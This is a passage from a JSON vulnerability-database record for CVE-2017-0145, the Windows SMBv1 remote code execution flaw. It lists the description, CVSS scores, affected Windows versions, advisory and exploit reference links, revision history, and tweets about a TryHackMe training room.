"https://ics-cert.us-cert.gov/advisories/ICSMA-18-058-02", "refsource": "MISC", "tags": [], "url": "https://ics-cert.us-cert.gov/advisories/ICSMA-18-058-02"}, {"name": "41987", "refsource": "EXPLOIT-DB", "tags": [], "url": "https://www.exploit-db.com/exploits/41987/"}, {"name": "41891", "refsource": "EXPLOIT-DB", "tags": [], "url": "https://www.exploit-db.com/exploits/41891/"}, {"name": "43970", "refsource": "EXPLOIT-DB", "tags": [], "url": "https://www.exploit-db.com/exploits/43970/"}, {"name": "1037991", "refsource": "SECTRACK", "tags": [], "url": "http://www.securitytracker.com/id/1037991"}, {"name": "http://packetstormsecurity.com/files/156196/SMB-DOUBLEPULSAR-Remote-Code-Execution.html", "refsource": "MISC", "tags": [], "url": "http://packetstormsecurity.com/files/156196/SMB-DOUBLEPULSAR-Remote-Code-Execution.html"}, {"name": "96703", "refsource": "BID", "tags": [], "url": "http://www.securityfocus.com/bid/96703"}, {"name": "http://packetstormsecurity.com/files/154690/DOUBLEPULSAR-Payload-Execution-Neutralization.html", "refsource": "MISC", "tags": [], "url": "http://packetstormsecurity.com/files/154690/DOUBLEPULSAR-Payload-Execution-Neutralization.html"}], "immutableFields": []}, {"id": "CVE-2017-0145", "bulletinFamily": "NVD", "title": "CVE-2017-0145", "description": "The SMBv1 server in Microsoft Windows Vista SP2; Windows Server 2008 SP2 and R2 SP1; Windows 7 SP1; Windows 8.1; Windows Server 2012 Gold and R2; Windows RT 8.1; and Windows 10 Gold, 1511, and 1607; and Windows Server 2016 allows remote attackers to execute arbitrary code via crafted packets, aka \"Windows SMB Remote Code Execution Vulnerability.\" This vulnerability is different from those described in CVE-2017-0143, CVE-2017-0144, CVE-2017-0146, and CVE-2017-0148.", "published": "2017-03-17T00:59:00", "modified": "2018-06-21T01:29:00", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-0145", "reporter": 
"secure@microsoft.com", "references": ["http://packetstormsecurity.com/files/156196/SMB-DOUBLEPULSAR-Remote-Code-Execution.html", "http://www.securityfocus.com/bid/96705", "https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-0145", "http://www.securitytracker.com/id/1037991", "https://www.exploit-db.com/exploits/41891/", "https://cert-portal.siemens.com/productcert/pdf/ssa-966341.pdf", "http://packetstormsecurity.com/files/154690/DOUBLEPULSAR-Payload-Execution-Neutralization.html", "https://www.exploit-db.com/exploits/41987/", "https://ics-cert.us-cert.gov/advisories/ICSMA-18-058-02", "https://cert-portal.siemens.com/productcert/pdf/ssa-701903.pdf"], "cvelist": ["CVE-2017-0145"], "type": "cve", "lastseen": "2021-04-23T00:07:42", "history": [{"bulletin": {"affectedConfiguration": [{"cpeName": "microsoft:windows_10", "name": "microsoft windows 10", "operator": "eq", "version": "1607"}, {"cpeName": "microsoft:windows_server_2008", "name": "microsoft windows server 2008", "operator": "eq", "version": "r2"}, {"cpeName": "microsoft:windows_rt_8.1", "name": "microsoft windows rt 8.1", "operator": "eq", "version": "-"}, {"cpeName": "microsoft:windows_8.1", "name": "microsoft windows 8.1", "operator": "eq", "version": "*"}, {"cpeName": "microsoft:windows_server_2012", "name": "microsoft windows server 2012", "operator": "eq", "version": "r2"}, {"cpeName": "microsoft:windows_server_2008", "name": "microsoft windows server 2008", "operator": "eq", "version": "-"}, {"cpeName": "microsoft:windows_server_2012", "name": "microsoft windows server 2012", "operator": "eq", "version": "-"}, {"cpeName": "microsoft:windows_7", "name": "microsoft windows 7", "operator": "eq", "version": "-"}, {"cpeName": "microsoft:windows_10", "name": "microsoft windows 10", "operator": "eq", "version": "*"}, {"cpeName": "microsoft:windows_10", "name": "microsoft windows 10", "operator": "eq", "version": "1511"}, {"cpeName": "microsoft:windows_vista", "name": "microsoft windows 
vista", "operator": "eq", "version": "-"}, {"cpeName": "microsoft:windows_server_2016", "name": "microsoft windows server 2016", "operator": "eq", "version": "-"}], "affectedSoftware": [{"cpeName": "microsoft:server_message_block", "name": "microsoft server message block", "operator": "eq", "version": "1.0"}], "bulletinFamily": "NVD", "cpe": ["cpe:/a:microsoft:server_message_block:1.0"], "cpe23": ["cpe:2.3:a:microsoft:server_message_block:1.0:*:*:*:*:*:*:*"], "cpeConfiguration": {"CVE_data_version": "4.0", "nodes": [{"children": [{"cpe_match": [{"cpe23Uri": "cpe:2.3:a:microsoft:server_message_block:1.0:*:*:*:*:*:*:*", "vulnerable": true}], "operator": "OR"}, {"cpe_match": [{"cpe23Uri": "cpe:2.3:o:microsoft:windows_8.1:*:*:*:*:*:*:*:*", "vulnerable": false}, {"cpe23Uri": "cpe:2.3:o:microsoft:windows_server_2008:-:sp2:*:*:*:*:*:*", "vulnerable": false}, {"cpe23Uri": "cpe:2.3:o:microsoft:windows_server_2012:-:gold:*:*:*:*:*:*", "vulnerable": false}, {"cpe23Uri": "cpe:2.3:o:microsoft:windows_rt_8.1:-:*:*:*:*:*:*:*", "vulnerable": false}, {"cpe23Uri": "cpe:2.3:o:microsoft:windows_7:-:sp1:*:*:*:*:*:*", "vulnerable": false}, {"cpe23Uri": "cpe:2.3:o:microsoft:windows_10:1511:*:*:*:*:*:*:*", "vulnerable": false}, {"cpe23Uri": "cpe:2.3:o:microsoft:windows_server_2016:-:*:*:*:*:*:*:*", "vulnerable": false}, {"cpe23Uri": "cpe:2.3:o:microsoft:windows_server_2008:r2:sp1:*:*:*:*:*:*", "vulnerable": false}, {"cpe23Uri": "cpe:2.3:o:microsoft:windows_10:1607:*:*:*:*:*:*:*", "vulnerable": false}, {"cpe23Uri": "cpe:2.3:o:microsoft:windows_10:*:*:*:*:*:*:*:*", "vulnerable": false}, {"cpe23Uri": "cpe:2.3:o:microsoft:windows_vista:-:sp2:*:*:*:*:*:*", "vulnerable": false}, {"cpe23Uri": "cpe:2.3:o:microsoft:windows_server_2012:r2:*:*:*:*:*:*:*", "vulnerable": false}], "operator": "OR"}], "operator": "AND"}]}, "cvelist": ["CVE-2017-0145"], "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cvss2": {"cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", 
"authentication": "NONE", "availabilityImpact": "COMPLETE", "baseScore": 9.3, "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.1, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0"}, "exploitabilityScore": 2.2, "impactScore": 5.9}, "cwe": ["CWE-20"], "description": "The SMBv1 server in Microsoft Windows Vista SP2; Windows Server 2008 SP2 and R2 SP1; Windows 7 SP1; Windows 8.1; Windows Server 2012 Gold and R2; Windows RT 8.1; and Windows 10 Gold, 1511, and 1607; and Windows Server 2016 allows remote attackers to execute arbitrary code via crafted packets, aka \"Windows SMB Remote Code Execution Vulnerability.\" This vulnerability is different from those described in CVE-2017-0143, CVE-2017-0144, CVE-2017-0146, and CVE-2017-0148.", "edition": 6, "enchantments": {"dependencies": {"modified": "2021-02-02T06:36:30", "references": [{"idList": ["MALWAREBYTES:2AA5391DE4E1CAB582414AAD58B623CC"], "type": "malwarebytes"}, {"idList": ["ICSMA-18-058-02"], "type": "ics"}, {"idList": ["RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607"], 
"type": "rapid7community"}, {"idList": ["1337DAY-ID-27786", "1337DAY-ID-27752", "1337DAY-ID-33313", "1337DAY-ID-33895", "1337DAY-ID-27613"], "type": "zdt"}, {"idList": ["OPENVAS:1361412562310810676", "OPENVAS:1361412562310810810"], "type": "openvas"}, {"idList": ["KB4013389"], "type": "mskb"}, {"idList": ["AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1", "AKB:D476227F-C4B1-49E3-9947-897077E5150D"], "type": "attackerkb"}, {"idList": ["THREATPOST:302BC8714784E3B4BB7EC5CD2F81C1BA", "THREATPOST:D6175B132FE6B7820E744D2387FE7D5D", "THREATPOST:6520102503D39BD2183F4ECDEFA9D591", "THREATPOST:046D40D1A5114EC07BBA6DB3AE27AA61"], "type": "threatpost"}, {"idList": ["MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE", "MSF:ILITIES/MSFT-CVE-2017-0145/"], "type": "metasploit"}, {"idList": ["THN:2E043D9BAC04DEE81005124DD54A31E2"], "type": "thn"}, {"idList": ["PACKETSTORM:154690", "PACKETSTORM:142181", "PACKETSTORM:142548", "PACKETSTORM:156196"], "type": "packetstorm"}, {"idList": ["SMNTC-96705"], "type": "symantec"}, {"idList": ["MS:CVE-2017-0145"], "type": "mscve"}, {"idList": ["MMPC:89789F73D15A0B331512F90F7E692851", "MMPC:FECB9309EE6D84976C56C12C05F1CD02", "MMPC:F4F919BF0CF7F97FD15CFA500398C7D9", "MMPC:F3E0CD42C341A30C758CB85AD9F6D052", "MMPC:C211C70545FBDF88C2F99362DC4608A8"], "type": "mmpc"}, {"idList": ["KLA11902", "KLA10977", "KLA10979"], "type": "kaspersky"}, {"idList": ["TRENDMICROBLOG:657A275464AD59827A9E6C1CD1726546", "TRENDMICROBLOG:4A07139FC4D015AFBEA9BD27C01BBA37"], "type": "trendmicroblog"}, {"idList": ["SSV:92952"], "type": "seebug"}, {"idList": ["EDB-ID:41987", "EDB-ID:47456", "EDB-ID:41891"], "type": "exploitdb"}, {"idList": ["F5:K57181937"], "type": "f5"}, {"idList": ["MS17-010.NASL", "SMB_NT_MS17-010.NASL"], "type": "nessus"}, {"idList": ["HUAWEI-SA-20170513-01-WINDOWS"], "type": 
"huawei"}], "rev": 2}, "exploitation": {"modified": "2021-02-02T06:36:30", "wildExploited": true, "wildExploitedSources": [{"idList": ["AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1", "AKB:D476227F-C4B1-49E3-9947-897077E5150D"], "type": "attackerkb"}]}, "score": {"modified": "2021-02-02T06:36:30", "rev": 2, "value": 9.1, "vector": "NONE"}, "twitter": {"counter": 55, "modified": "2021-02-02T06:36:30", "tweets": [{"link": "https://twitter.com/Hobbes85ae1/status/1384683091181047808", "text": "Blue - I have just completed this room! Check it out: https://t.co/lqz4GMSKMq?amp=1 /hashtag/tryhackme?src=hashtag_click /hashtag/windows?src=hashtag_click /hashtag/eternal?src=hashtag_click blue # MS17-010 # CVE2017-0144 # CVE-2017-0145 # CVE-2017-0146 /hashtag/CVE?src=hashtag_click-2017-0147 /hashtag/CVE?src=hashtag_click-2017-0148 /hashtag/SMB?src=hashtag_click /hashtag/CVE?src=hashtag_click-2017-0143 /hashtag/video?src=hashtag_click /hashtag/blue?src=hashtag_click via /RealTryHackMe"}, {"link": "https://twitter.com/jblanko1984/status/1382343441040936960", "text": "Blue - I have just completed this room! Check it out: https://t.co/JR1xhzqLZN?amp=1 /hashtag/tryhackme?src=hashtag_click /hashtag/windows?src=hashtag_click /hashtag/eternal?src=hashtag_click blue # MS17-010 # CVE2017-0144 # CVE-2017-0145 # CVE-2017-0146 /hashtag/CVE?src=hashtag_click-2017-0147 /hashtag/CVE?src=hashtag_click-2017-0148 /hashtag/SMB?src=hashtag_click /hashtag/CVE?src=hashtag_click-2017-0143 /hashtag/video?src=hashtag_click /hashtag/blue?src=hashtag_click via /RealTryHackMe"}, {"link": "https://twitter.com/dwambia/status/1381683825042931712", "text": "Blue - I have just completed this room! 
Check it out: https://t.co/6qcJuSTklT?amp=1 /hashtag/tryhackme?src=hashtag_click /hashtag/windows?src=hashtag_click /hashtag/eternal?src=hashtag_click blue # MS17-010 # CVE2017-0144 # CVE-2017-0145 # CVE-2017-0146 /hashtag/CVE?src=hashtag_click-2017-0147 /hashtag/CVE?src=hashtag_click-2017-0148 /hashtag/SMB?src=hashtag_click /hashtag/CVE?src=hashtag_click-2017-0143 /hashtag/video?src=hashtag_click /hashtag/blue?src=hashtag_click via /RealTryHackMe"}, {"link": "https://twitter.com/Cameron16996962/status/1385269426321231876", "text": "Brute It - I have just completed this room! Check it out: https://t.co/P0vO3cuyJm?amp=1 /hashtag/tryhackme?src=hashtag_click /hashtag/windows?src=hashtag_click /hashtag/eternal?src=hashtag_click blue # MS17-010 # CVE2017-0144 # CVE-2017-0145 # CVE-2017-0146 /hashtag/CVE?src=hashtag_click-2017-0147 /hashtag/CVE?src=hashtag_click-2017-0148 /hashtag/SMB?src=hashtag_click /hashtag/CVE?src=hashtag_click-2017-0143 /hashtag/video?src=hashtag_click /hashtag/bruteit?src=hashtag_click via /RealTryHackMe"}, {"link": "https://twitter.com/ihoruhe/status/1381730384447213573", "text": "Blue - I have just completed this room! Check it out: https://t.co/0vHkuPlF0m?amp=1 /hashtag/tryhackme?src=hashtag_click /hashtag/windows?src=hashtag_click /hashtag/eternal?src=hashtag_click blue # MS17-010 # CVE2017-0144 # CVE-2017-0145 # CVE-2017-0146 /hashtag/CVE?src=hashtag_click-2017-0147 /hashtag/CVE?src=hashtag_click-2017-0148 /hashtag/SMB?src=hashtag_click /hashtag/CVE?src=hashtag_click-2017-0143 /hashtag/video?src=hashtag_click /hashtag/blue?src=hashtag_click via /RealTryHackMe"}, {"link": "https://twitter.com/yellephen/status/1373222110034759681", "text": "Blue - I have just completed this room! 
Check it out: https://t.co/WbveSWg8dJ?amp=1 /hashtag/tryhackme?src=hashtag_click /hashtag/windows?src=hashtag_click /hashtag/eternal?src=hashtag_click blue # MS17-010 # CVE2017-0144 # CVE-2017-0145 # CVE-2017-0146 /hashtag/CVE?src=hashtag_click-2017-0147 /hashtag/CVE?src=hashtag_click-2017-0148 /hashtag/SMB?src=hashtag_click /hashtag/CVE?src=hashtag_click-2017-0143 /hashtag/video?src=hashtag_click /hashtag/blue?src=hashtag_click via /RealTryHackMe"}, {"link": "https://twitter.com/chittomodekinai/status/1376211737238626307", "text": "Blue - I have just completed this room! Check it out: https://t.co/ztz5xEd3UX?amp=1 /hashtag/tryhackme?src=hashtag_click /hashtag/windows?src=hashtag_click /hashtag/eternal?src=hashtag_click blue # MS17-010 # CVE2017-0144 # CVE-2017-0145 # CVE-2017-0146 /hashtag/CVE?src=hashtag_click-2017-0147 /hashtag/CVE?src=hashtag_click-2017-0148 /hashtag/SMB?src=hashtag_click /hashtag/CVE?src=hashtag_click-2017-0143 /hashtag/video?src=hashtag_click /hashtag/blue?src=hashtag_click /RealTryHackMe\u3088\u308a"}, {"link": "https://twitter.com/CoolHandSquid/status/1382098669852372992", "text": "Blue - I have just completed this room! Check it out: https://t.co/zCwRy6GPJf?amp=1 /hashtag/tryhackme?src=hashtag_click /hashtag/windows?src=hashtag_click /hashtag/eternal?src=hashtag_click blue # MS17-010 # CVE2017-0144 # CVE-2017-0145 # CVE-2017-0146 /hashtag/CVE?src=hashtag_click-2017-0147 /hashtag/CVE?src=hashtag_click-2017-0148 /hashtag/SMB?src=hashtag_click /hashtag/CVE?src=hashtag_click-2017-0143 /hashtag/video?src=hashtag_click /hashtag/blue?src=hashtag_click via /RealTryHackMe"}, {"link": "https://twitter.com/_nabeen/status/1381922890770042887", "text": "\u307e\u3060writeup\u307f\u306a\u3044\u3068\u30c0\u30e1\u306d\n\nBlue - I have just completed this room! 
Check it out: https://t.co/jAlK4M1Ntn?amp=1 /hashtag/tryhackme?src=hashtag_click /hashtag/windows?src=hashtag_click /hashtag/eternal?src=hashtag_click blue # MS17-010 # CVE2017-0144 # CVE-2017-0145 # CVE-2017-0146 /hashtag/CVE?src=hashtag_click-2017-0147 /hashtag/CVE?src=hashtag_click-2017-0148 /hashtag/SMB?src=hashtag_click /hashtag/CVE?src=hashtag_click-2017-0143 /hashtag/video?src=hashtag_click /hashtag/blue?src=hashtag_click /RealTryHackMe\u3088\u308a"}, {"link": "https://twitter.com/BELKHIRIKhired1/status/1383176994536456201", "text": "Blue - I have just completed this room! Check it out: https://t.co/eoVe5ak68d?amp=1 /hashtag/tryhackme?src=hashtag_click /hashtag/windows?src=hashtag_click /hashtag/eternal?src=hashtag_click blue # MS17-010 # CVE2017-0144 # CVE-2017-0145 # CVE-2017-0146 /hashtag/CVE?src=hashtag_click-2017-0147 /hashtag/CVE?src=hashtag_click-2017-0148 /hashtag/SMB?src=hashtag_click /hashtag/CVE?src=hashtag_click-2017-0143 /hashtag/video?src=hashtag_click /hashtag/blue?src=hashtag_click via /RealTryHackMe"}]}}, "extraReferences": [{"name": "https://cert-portal.siemens.com/productcert/pdf/ssa-966341.pdf", "refsource": "CONFIRM", "tags": [], "url": "https://cert-portal.siemens.com/productcert/pdf/ssa-966341.pdf"}, {"name": "https://cert-portal.siemens.com/productcert/pdf/ssa-701903.pdf", "refsource": "CONFIRM", "tags": [], "url": "https://cert-portal.siemens.com/productcert/pdf/ssa-701903.pdf"}, {"name": "https://ics-cert.us-cert.gov/advisories/ICSMA-18-058-02", "refsource": "MISC", "tags": [], "url": "https://ics-cert.us-cert.gov/advisories/ICSMA-18-058-02"}, {"name": "41987", "refsource": "EXPLOIT-DB", "tags": [], "url": "https://www.exploit-db.com/exploits/41987/"}, {"name": "https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-0145", "refsource": "CONFIRM", "tags": ["Patch", "Vendor Advisory"], "url": "https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-0145"}, {"name": "41891", "refsource": 
"EXPLOIT-DB", "tags": [], "url": "https://www.exploit-db.com/exploits/41891/"}, {"name": "1037991", "refsource": "SECTRACK", "tags": [], "url": "http://www.securitytracker.com/id/1037991"}, {"name": "http://packetstormsecurity.com/files/156196/SMB-DOUBLEPULSAR-Remote-Code-Execution.html", "refsource": "MISC", "tags": [], "url": "http://packetstormsecurity.com/files/156196/SMB-DOUBLEPULSAR-Remote-Code-Execution.html"}, {"name": "96705", "refsource": "BID", "tags": [], "url": "http://www.securityfocus.com/bid/96705"}, {"name": "http://packetstormsecurity.com/files/154690/DOUBLEPULSAR-Payload-Execution-Neutralization.html", "refsource": "MISC", "tags": [], "url": "http://packetstormsecurity.com/files/154690/DOUBLEPULSAR-Payload-Execution-Neutralization.html"}], "hash": "417c6d7b4dbe6355f9992d91434470ae0c7af215000d332be5b9e9437e22f4a4", "hashmap": [{"hash": "fa45dfd2d3ab3df8318df841cddd6b0c", "key": "title"}, {"hash": "2c23b77afb0f021934f5effbf46ef757", "key": "extraReferences"}, {"hash": "732a831a7eed3955e8de18b2d8903bc8", "key": "cvss3"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "immutableFields"}, {"hash": "d931342d7091edb0db4db482c531ce39", "key": "cpeConfiguration"}, {"hash": "6e85843f0a1ea97153b93d90b1fbe01c", "key": "cvelist"}, {"hash": "f54a01beedb777f2ca261ddba30cf1a5", "key": "published"}, {"hash": "e0539df20e5be3ef177a101df2352a5e", "key": "href"}, {"hash": "e758f8fa39ce9e8de2ffe527ec8b6423", "key": "affectedSoftware"}, {"hash": "226da5129ffaaee3d5b48e506b957d58", "key": "cwe"}, {"hash": "a173072793578541ea04b7baa0323592", "key": "cpe"}, {"hash": "d726e774add6189e33cf2ea0c61a2ba5", "key": "cvss"}, {"hash": "dd4a1fba31e29c6988f563bdeb65c80c", "key": "affectedConfiguration"}, {"hash": "0751f4e56f29adf827144e01a128331d", "key": "cpe23"}, {"hash": "1716b5fcbb7121af74efdc153d0166c5", "key": "type"}, {"hash": "e8dbb4c019811b96da3443b871bd4b26", "key": "cvss2"}, {"hash": "601892ece72be3be2f57266ca2354792", "key": "bulletinFamily"}, {"hash": 
"d68798550042e5272198c20ea65d8f01", "key": "modified"}, {"hash": "cf496359fbe86c47c00b29590cbc0738", "key": "references"}, {"hash": "01656a0a375c60b2d690e64e9b9d5852", "key": "description"}, {"hash": "444c2b4dda4a55437faa8bef1a141e84", "key": "reporter"}], "history": [], "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-0145", "id": "CVE-2017-0145", "immutableFields": [], "lastseen": "2021-02-02T06:36:30", "modified": "2018-06-21T01:29:00", "objectVersion": "1.5", "published": "2017-03-17T00:59:00", "references": ["http://packetstormsecurity.com/files/156196/SMB-DOUBLEPULSAR-Remote-Code-Execution.html", "http://www.securityfocus.com/bid/96705", "https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-0145", "http://www.securitytracker.com/id/1037991", "https://www.exploit-db.com/exploits/41891/", "https://cert-portal.siemens.com/productcert/pdf/ssa-966341.pdf", "http://packetstormsecurity.com/files/154690/DOUBLEPULSAR-Payload-Execution-Neutralization.html", "https://www.exploit-db.com/exploits/41987/", "https://ics-cert.us-cert.gov/advisories/ICSMA-18-058-02", "https://cert-portal.siemens.com/productcert/pdf/ssa-701903.pdf"], "reporter": "cve@mitre.org", "title": "CVE-2017-0145", "type": "cve", "viewCount": 80}, "different_elements": ["reporter", "cpeConfiguration"], "edition": 6, "lastseen": "2021-02-02T06:36:30"}, {"bulletin": {"affectedConfiguration": [], "affectedSoftware": [{"cpeName": "microsoft:server_message_block", "name": "microsoft server message block", "operator": "eq", "version": "1.0"}], "bulletinFamily": "NVD", "cpe": ["cpe:/a:microsoft:server_message_block:1.0"], "cpe23": ["cpe:2.3:a:microsoft:server_message_block:1.0:*:*:*:*:*:*:*"], "cpeConfiguration": {}, "cvelist": ["CVE-2017-0145"], "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cvss2": {"cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "COMPLETE", "baseScore": 9.3, 
"confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.1, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0"}, "exploitabilityScore": 2.2, "impactScore": 5.9}, "cwe": ["CWE-20"], "description": "The SMBv1 server in Microsoft Windows Vista SP2; Windows Server 2008 SP2 and R2 SP1; Windows 7 SP1; Windows 8.1; Windows Server 2012 Gold and R2; Windows RT 8.1; and Windows 10 Gold, 1511, and 1607; and Windows Server 2016 allows remote attackers to execute arbitrary code via crafted packets, aka \"Windows SMB Remote Code Execution Vulnerability.\" This vulnerability is different from those described in CVE-2017-0143, CVE-2017-0144, CVE-2017-0146, and CVE-2017-0148.", "edition": 4, "enchantments": {"dependencies": {"modified": "2020-09-21T14:31:16", "references": [{"idList": ["MALWAREBYTES:2AA5391DE4E1CAB582414AAD58B623CC"], "type": "malwarebytes"}, {"idList": ["ICSMA-18-058-02"], "type": "ics"}, {"idList": ["RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607"], "type": "rapid7community"}, {"idList": ["1337DAY-ID-27786", "1337DAY-ID-27752", 
"1337DAY-ID-33313", "1337DAY-ID-33895", "1337DAY-ID-27613"], "type": "zdt"}, {"idList": ["OPENVAS:1361412562310810676", "OPENVAS:1361412562310810810"], "type": "openvas"}, {"idList": ["KB4013389"], "type": "mskb"}, {"idList": ["THREATPOST:302BC8714784E3B4BB7EC5CD2F81C1BA", "THREATPOST:D6175B132FE6B7820E744D2387FE7D5D", "THREATPOST:6520102503D39BD2183F4ECDEFA9D591", "THREATPOST:046D40D1A5114EC07BBA6DB3AE27AA61"], "type": "threatpost"}, {"idList": ["THN:2E043D9BAC04DEE81005124DD54A31E2"], "type": "thn"}, {"idList": ["PACKETSTORM:154690", "PACKETSTORM:142181", "PACKETSTORM:142548", "PACKETSTORM:156196"], "type": "packetstorm"}, {"idList": ["SMNTC-96705"], "type": "symantec"}, {"idList": ["MS:CVE-2017-0145"], "type": "mscve"}, {"idList": ["MMPC:89789F73D15A0B331512F90F7E692851", "MMPC:FECB9309EE6D84976C56C12C05F1CD02", "MMPC:F4F919BF0CF7F97FD15CFA500398C7D9", "MMPC:F3E0CD42C341A30C758CB85AD9F6D052", "MMPC:C211C70545FBDF88C2F99362DC4608A8"], "type": "mmpc"}, {"idList": ["KLA11902", "KLA10977", "KLA10979"], "type": "kaspersky"}, {"idList": ["TRENDMICROBLOG:657A275464AD59827A9E6C1CD1726546", "TRENDMICROBLOG:4A07139FC4D015AFBEA9BD27C01BBA37"], "type": "trendmicroblog"}, {"idList": ["SSV:92952"], "type": "seebug"}, {"idList": ["EDB-ID:41987", "EDB-ID:47456", "EDB-ID:41891"], "type": "exploitdb"}, {"idList": ["F5:K57181937"], "type": "f5"}, {"idList": ["MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE"], "type": "metasploit"}, {"idList": ["MS17-010.NASL", "SMB_NT_MS17-010.NASL"], "type": "nessus"}, {"idList": ["HUAWEI-SA-20170513-01-WINDOWS"], "type": "huawei"}], "rev": 2}, "score": {"modified": "2020-09-21T14:31:16", "rev": 2, "value": 9.1, "vector": "NONE"}}, "hash": "c41048ea6dcd4e7327ea455828df8d955bd52536e1a117875e7433d4d6d1bd94", "hashmap": [{"hash": "fa45dfd2d3ab3df8318df841cddd6b0c", 
"key": "title"}, {"hash": "732a831a7eed3955e8de18b2d8903bc8", "key": "cvss3"}, {"hash": "6e85843f0a1ea97153b93d90b1fbe01c", "key": "cvelist"}, {"hash": "f54a01beedb777f2ca261ddba30cf1a5", "key": "published"}, {"hash": "e0539df20e5be3ef177a101df2352a5e", "key": "href"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "affectedConfiguration"}, {"hash": "e758f8fa39ce9e8de2ffe527ec8b6423", "key": "affectedSoftware"}, {"hash": "226da5129ffaaee3d5b48e506b957d58", "key": "cwe"}, {"hash": "a173072793578541ea04b7baa0323592", "key": "cpe"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cpeConfiguration"}, {"hash": "d726e774add6189e33cf2ea0c61a2ba5", "key": "cvss"}, {"hash": "0751f4e56f29adf827144e01a128331d", "key": "cpe23"}, {"hash": "1716b5fcbb7121af74efdc153d0166c5", "key": "type"}, {"hash": "e8dbb4c019811b96da3443b871bd4b26", "key": "cvss2"}, {"hash": "601892ece72be3be2f57266ca2354792", "key": "bulletinFamily"}, {"hash": "d68798550042e5272198c20ea65d8f01", "key": "modified"}, {"hash": "cf496359fbe86c47c00b29590cbc0738", "key": "references"}, {"hash": "01656a0a375c60b2d690e64e9b9d5852", "key": "description"}, {"hash": "444c2b4dda4a55437faa8bef1a141e84", "key": "reporter"}], "history": [], "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-0145", "id": "CVE-2017-0145", "lastseen": "2020-09-21T14:31:16", "modified": "2018-06-21T01:29:00", "objectVersion": "1.3", "published": "2017-03-17T00:59:00", "references": ["http://packetstormsecurity.com/files/156196/SMB-DOUBLEPULSAR-Remote-Code-Execution.html", "http://www.securityfocus.com/bid/96705", "https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-0145", "http://www.securitytracker.com/id/1037991", "https://www.exploit-db.com/exploits/41891/", "https://cert-portal.siemens.com/productcert/pdf/ssa-966341.pdf", 